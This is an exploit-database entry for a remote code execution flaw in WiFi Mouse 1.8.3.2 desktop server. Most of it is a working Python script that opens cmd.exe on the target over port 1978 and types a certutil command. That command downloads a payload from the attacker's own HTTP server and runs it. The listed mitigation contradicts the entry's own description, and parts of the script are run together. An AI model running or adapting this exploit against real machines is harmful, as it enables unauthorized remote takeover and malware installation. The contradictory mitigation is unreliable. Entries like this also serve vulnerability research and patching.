WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)

vendor:

WiFi Mouse

by:

Payal

8.8

CVSS

HIGH

Remote Code Execution (RCE)

CWE

Product Name: WiFi Mouse

Affected Version From: 1.8.3.2

Affected Version To: 1.8.3.2

Patch Exists: NO

Related CWE:

CPE: a:necta:wifi_mouse:1.8.3.2

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 Pro Build 21H2

2022

WiFi Mouse 1.8.3.2 – Remote Code Execution (RCE)

Desktop Server software used by mobile app has PIN option which does not to prevent command input. Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input. A python script is used to exploit the vulnerability by sending a payload to the target IP address and executing it.

Mitigation:

Ensure that the PIN option is enabled to prevent command input.

Source

Exploit-DB raw data:

# Exploit Title: WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)
# Date: 13-10-2022
# Author: Payal
# Vendor Homepage: http://necta.us/
# Software Link: http://wifimouse.necta.us/#download
# Version: 1.8.3.2
# Tested on: Windows 10 Pro Build 21H2

# Desktop Server software used by mobile app has PIN option which does not to prevent command input.# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input.
#!/usr/bin/env python3
from socket import socket, AF_INET, SOCK_STREAMfrom time import
sleepimport sysimport string

target = socket(AF_INET, SOCK_STREAM)
port = 1978
try:
	rhost = sys.argv[1]
	lhost = sys.argv[2]
	payload = sys.argv[3]except:
	print("USAGE: python " + sys.argv[0]+ " <target-ip>
<local-http-server-ip> <payload-name>")
	exit()


characters={
	"A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",
	"O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",
	"a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",
	"o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",
	"1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",
	" ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",
	">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",
	"(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",
	"\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}

def openCMD():
	target.sendto(bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a"),
(rhost,port)) # openfile /C/Windows/System32/cmd.exe
def SendString(string):
	for char in string:
		target.sendto(bytes.fromhex("7574663820" + characters[char] +
"0a"),(rhost,port)) # Sends Character hex with packet padding
		sleep(0.03)
def SendReturn():
	target.sendto(bytes.fromhex("6b657920203352544e"),(rhost,port)) #
'key 3RTN' - Similar to 'Remote Mouse' mobile app
	sleep(0.5)
def exploit():
	print("[+] 3..2..1..")
	sleep(2)
	openCMD()
	print("[+] *Super fast hacker typing*")
	sleep(1)
	SendString("certutil.exe -urlcache -f http://" + lhost + "/" +
payload + " C:\\Windows\\Temp\\" + payload)
	SendReturn()
	print("[+] Retrieving payload")
	sleep(3)
	SendString("C:\\Windows\\Temp\\" + payload)
	SendReturn()
	print("[+] Done! Check Your Listener?")

def main():
	target.connect((rhost,port))
	exploit()
	target.close()
	exit()
if __name__=="__main__":
	main()